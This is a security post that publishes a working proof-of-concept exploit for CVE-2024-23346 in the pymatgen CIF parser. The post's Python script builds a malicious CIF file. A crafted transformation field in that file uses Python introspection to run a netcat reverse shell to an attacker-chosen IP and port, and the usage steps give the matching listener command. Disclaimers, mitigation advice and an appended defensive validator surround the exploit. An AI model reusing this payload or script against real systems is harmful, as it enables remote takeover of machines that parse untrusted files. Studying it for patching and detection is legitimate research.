Pymatgen 2024.1 CIF Parser Remote Code Execution (CVE-2024-23346) – Exploit PoC
This post contains technical details about security vulnerabilities and exploit development for educational and research purposes only. All techniques described are intended for use in authorized penetration testing, CTF competitions, or controlled lab environments.
Unauthorized use of these techniques against systems you do not own or have explicit written permission to test is illegal and unethical. Always obtain proper authorization before testing.
Disclosure status: Patch Available
CVE references link to public NVD / vendor advisories. Proof-of-concept code, where included, is provided after patch availability for defensive research purposes.
Overview
A critical remote code execution vulnerability tracked as CVE-2024-23346 affects pymatgen, a widely used library in computational materials science.
The vulnerability occurs in the CIF file parsing functionality. When a specially crafted CIF file is processed by the parser, malicious Python expressions embedded inside certain fields can be evaluated, leading to arbitrary command execution on the host system.
This issue can allow attackers to gain system-level access if an application automatically processes untrusted CIF files.
Affected Software
Vendor: Pymatgen Project
Software: pymatgen
Affected version:
- pymatgen 2024.1
Tested environment:
- Kali Linux 2024.1
Technical Details
The vulnerability arises from unsafe evaluation of expressions embedded within CIF file fields during parsing.
By crafting a malicious CIF file containing specially designed Python expressions, an attacker can abuse Python’s object introspection mechanisms to access internal classes and execute arbitrary commands through the operating system.
This exploit demonstrates the ability to spawn a reverse shell when the malicious CIF file is parsed.
Proof of Concept (PoC)
The following script generates a malicious CIF file and triggers the vulnerable parser.
# Exploit Title : Pymatgen 2024.1 - Remote Code Execution (RCE)
# Google Dork : (not applicable)
# Date : 2024-11-13
# Exploit Author : Mohammed Idrees Banyamer
# Vendor Homepage : https://pymatgen.org
# Software Link : https://pypi.org/project/pymatgen/
# Version : 2024.1
# Tested on : Kali Linux 2024.1
# CVE : CVE-2024-23346
import os


# Function to create the malicious CIF file
def create_malicious_cif(ip, port):
    # Constructing the malicious CIF file with reverse shell payload
    malicious_cif = f"""
data_5yOhtAoR
_audit_creation_date 2024-11-13
_audit_creation_method "CVE-2024-23346 Pymatgen CIF Parser Reverse Shell Exploit"
loop_
_parent_propagation_vector.id
_parent_propagation_vector.kxkykz
k1 [0 0 0]
_space_group_magn.transform_BNS_Pp_abc 'a,b,[d for d in ().__class__.__mro__[1].__getattribute__ ( *[().__class__.__mro__[1]]+["__sub" + "classes__"]) () if d.__name__ == "BuiltinImporter"][0].load_module ("os").system ("nc {ip} {port} -e /bin/bash");0,0,0'
_space_group_magn.number_BNS 62.448
_space_group_magn.name_BNS "P n' m a' "
"""
    # Save to a file
    with open("vuln.cif", "w") as file:
        file.write(malicious_cif)
    print("[*] Malicious CIF file created: vuln.cif")


# Function to trigger the exploit by parsing the malicious CIF file
def exploit():
    ip = input("Enter your IP address for the reverse shell: ")
    port = input("Enter the port for the reverse shell to listen on: ")
    # Create the malicious CIF file
    create_malicious_cif(ip, port)
    # Trigger the Pymatgen CIF parser to parse the malicious file
    from pymatgen.io.cif import CifParser
    parser = CifParser("vuln.cif")
    structure = parser.parse_structures()


# Running the exploit
if __name__ == "__main__":
    exploit()
How the Exploit Works
The exploit performs the following steps:
- Generates a malicious CIF file containing a payload.
- The payload uses Python object introspection to access system-level functionality.
- When the CIF file is parsed by the pymatgen parser, the payload executes.
- A reverse shell connection is established to the attacker-controlled system.
Usage
Run the exploit script:
python3 exploit.py
The script will prompt for:
- Attacker IP address
- Listening port
Once executed, the malicious CIF file is generated and parsed, triggering the payload.
Before running the exploit, start a listener on your system:
nc -lvnp <port>
Impact
Successful exploitation may allow attackers to:
- Execute arbitrary system commands
- Gain remote shell access
- Compromise scientific computing environments
- Escalate attacks in research infrastructures
Mitigation
Recommended security measures include:
- Update pymatgen to a patched version
- Do not parse CIF files from untrusted sources
- Run scientific parsing tools inside sandboxed environments
- Apply strict validation to CIF files before they reach the parser
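As an added defensive example (not part of the original PoC or of pymatgen itself), the following pre-parse gate applies the "strict validation" point above to the transformation tag the PoC abuses: a value that contains anything beyond plain Jones-Faithful notation (axis letters, digits, arithmetic operators, fraction slashes, commas, semicolons) is rejected before the file is handed to the parser. The tag names, the conservative allowlist and the sample CIF texts are assumptions made here for illustration; legitimate but unusual notation may be flagged and the allowlist should be tuned to the files an installation actually handles.

```python
import re

# Conservative allowlist for a Jones-Faithful transformation string such as
# 'a,b,c;0,0,0' or '-a+b,a,2c;1/2,0,0': axis letters, digits, + - * / . , ;
# and whitespace. Underscores, brackets, quotes, parentheses and any other
# letters are rejected, which blocks attribute access and calls outright.
SAFE_TRANSFORM = re.compile(r"^[abcxyz0-9\s+\-*/.,;]*$")

# First tag is the one shown in the PoC; the second is an assumed variant
# name added for illustration and may not exist in any real CIF dictionary.
TRANSFORM_TAGS = frozenset({
    "_space_group_magn.transform_BNS_Pp_abc",
    "_space_group_magn.transform_BNS_Pp",
})


def _strip_quotes(value: str) -> str:
    """Drop one layer of CIF single or double quotes around a value."""
    value = value.strip()
    if len(value) >= 2 and value[0] == value[-1] and value[0] in "'\"":
        return value[1:-1]
    return value


def find_unsafe_transforms(cif_text: str) -> list[tuple[int, str, str]]:
    """Return (line_no, tag, value) for every transformation value that
    fails the allowlist. Only single-line 'tag value' pairs are inspected."""
    findings = []
    for line_no, line in enumerate(cif_text.splitlines(), start=1):
        parts = line.strip().split(None, 1)
        if len(parts) != 2 or parts[0] not in TRANSFORM_TAGS:
            continue
        value = _strip_quotes(parts[1])
        if not SAFE_TRANSFORM.fullmatch(value):
            findings.append((line_no, parts[0], value))
    return findings


def is_safe_to_parse(cif_text: str) -> bool:
    """True when no inspected transformation value violates the allowlist."""
    return not find_unsafe_transforms(cif_text)


# Constructed sample files (not real crystal data).
BENIGN_CIF = """data_benign
_space_group_magn.transform_BNS_Pp_abc 'a,b,c;0,0,0'
_space_group_magn.number_BNS 62.448
"""
SUSPICIOUS_CIF = """data_suspect
_space_group_magn.transform_BNS_Pp_abc 'a,b,c.__doc__;0,0,0'
"""

if __name__ == "__main__":
    for name, text in (("benign", BENIGN_CIF), ("suspicious", SUSPICIOUS_CIF)):
        print(name, "->", "ok" if is_safe_to_parse(text) else find_unsafe_transforms(text))
```

The gate only covers the tags it knows about, so it is a stopgap for installations that cannot upgrade immediately rather than a replacement for the patched parser.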
Researcher
Security research conducted by:
Mohammed Idrees Banyamer
Cybersecurity Researcher – Jordan 🇯🇴
Instagram: @banyamer_security
GitHub: https://github.com/mbanyamer
Disclaimer
This proof-of-concept is provided for educational purposes and authorized security testing only. Unauthorized use against systems without explicit permission is illegal.